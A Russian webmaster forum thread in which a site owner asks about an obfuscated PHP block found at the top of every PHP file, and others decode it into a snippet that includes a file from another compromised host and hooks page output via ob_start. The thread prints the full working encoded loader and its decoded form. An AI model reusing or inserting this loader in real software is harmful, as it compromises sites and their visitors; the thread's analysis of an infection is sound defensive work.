Подскажите, что за это за код

12
MINISTR808
На сайте с 12.02.2010
Offline
44
2075

Нашел в начале каждого php файла на сайте вот этот лишний код:

<?php

$md5 = "f80a11c63c33cc957efb379987c4732d";
$a3 = array("_",'o',"i",'b',"d",'n',")","g",'6',"a",'r','4','t','z','f','e',"c",'v','l','$','s',";","(");
$b37 = create_function('$'.'v',$a3[15].$a3[17].$a3[9].$a3[18].$a3[22].$a3[7].$a3[13].$a3[2].$a3[5].$a3[14].$a3[18].$a3[9].$a3[12].$a3[15].$a3[22].$a3[3].$a3[9].$a3[20].$a3[15].$a3[8].$a3[11].$a3[0].$a3[4].$a3[15].$a3[16].$a3[1].$a3[4].$a3[15].$a3[22].$a3[19].$a3[17].$a3[6].$a3[6].$a3[6].$a3[21]);
$b37('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999///N/');
?>

подскажите, что это такое и насколько страшно для сайта.

PR
На сайте с 30.12.2007
Offline
93
#1

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/var/www/user324/data/www/eshop.zp.ua/cgi-bin/31c.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
K5
На сайте с 21.07.2010
Offline
209
#2

у меня отрабатывает так


Warning: file_exists(): open_basedir restriction in effect. File(/var/www/user324/data/www/eshop.zp.ua/cgi-bin/31c.php) is not within the allowed path(s): (/var/www/kgtu5/data:.) in /var/www/kgtu5/data/www/insreg.ru/3/vk.php(4) : runtime-created function(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1

собственно ничего хорошего в нем нет, в топку...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#3


if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))
{
$GLOBALS['mfsn']='/var/www/user324/data/www/eshop.zp.ua/cgi-bin/31c.php';
if(file_exists($GLOBALS['mfsn']))
{
include_once($GLOBALS['mfsn']);
if(function_exists('gml')&&function_exists('dgobh'))
{
ob_start('dgobh');
}
}
}

ТС, с Вас клавиша F4(редактировать файл в ТоталКомандере) и F5(обновить в мозиле).

Досчитал до 10, сбился со счета. Примерно на 20 итераций(на глаз) было запаковано:)

ЗЫ. опередили:)

ЗЗЫ. kgtu5, зачем запускаете? Не боитесь? Я как нить специально для Вас в следующий раз создам аналогичную тему, тока запишу код рекурсивного удаления всех файлов начиная от корня:)

Подпись))
fa2m
На сайте с 07.09.2011
Offline
23
#4
Милованов Ю.С:

Примерно на 20 итераций(на глаз) было запаковано:)

О, спасибо, а то я вручную начал распаковывать )))))))))) Думал, ну может там пару штук их ))))

Встречи в Днепре /ru/forum/736064 (/ru/forum/736064) Беклинк за копейку. Удобный сервис анализа обратных ссылок. (http://backlink.page-weight.ru/)
Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#5

Так я тоже в ручную:)

На 10 итерации где-то, когда сбился со счета, возникла мысля написать скриптец, но лень-матушка(мотивируя нежелание написания скрипта уменьшением кода с каждой итерацией, сделав примерный подсчет в уме что их будет не больше 40) в очередной раз одержала победу над здравым смыслом, и процесс был продолжен в ручном режиме.

Trafikgon
На сайте с 24.10.2008
Offline
174
#6

Наверно - это вирус тс.

. (#)
K5
На сайте с 21.07.2010
Offline
209
#7
Милованов Ю.С:

ЗЗЫ. kgtu5, зачем запускаете? Не боитесь? Я как нить специально для Вас в следующий раз создам аналогичную тему, тока запишу код рекурсивного удаления всех файлов начиная от корня:)

ок, теперь буду запускать только на том хостинге, где плохо ребята работают, может чего полезное им потрем 🤪

Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#8

eshop.zp.ua/cgi-bin/31c.php

отвечает 200ым кодом, длина контента 36.

Непонятно что за файл, но этот код подключает этот самый файл и включает буферизацию, указывая функцию для обработки вывода - dgobh();

ТС, что там происходит, Вам вряд ли здесь кто-то скажет, ибо тут СЕ а не телепат.рф:)

Вообще, по хорошему, сделайте это, и уже дальше будете плясать(с бубном?) исходя из результатов.

fa2m
На сайте с 07.09.2011
Offline
23
#9
Милованов Ю.С:
Так я тоже в ручную:)
На 10 итерации где-то, когда сбился со счета, возникла мысля написать скриптец, но лень-матушка(мотивируя нежелание написания скрипта уменьшением кода с каждой итерацией, сделав примерный подсчет в уме что их будет не больше 40) в очередной раз одержала победу над здравым смыслом, и процесс был продолжен в ручном режиме.

Ну спасибо, Вы меня выручили )) А я начал всё-таки писать скриптец, интересно было сколько там итераций )) Но увидев, что Вы назвали примерное количество - желание пропало ))

siv1987
На сайте с 02.04.2009
Offline
427
#10

26 итерации против скрипта за 5 минут.))

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий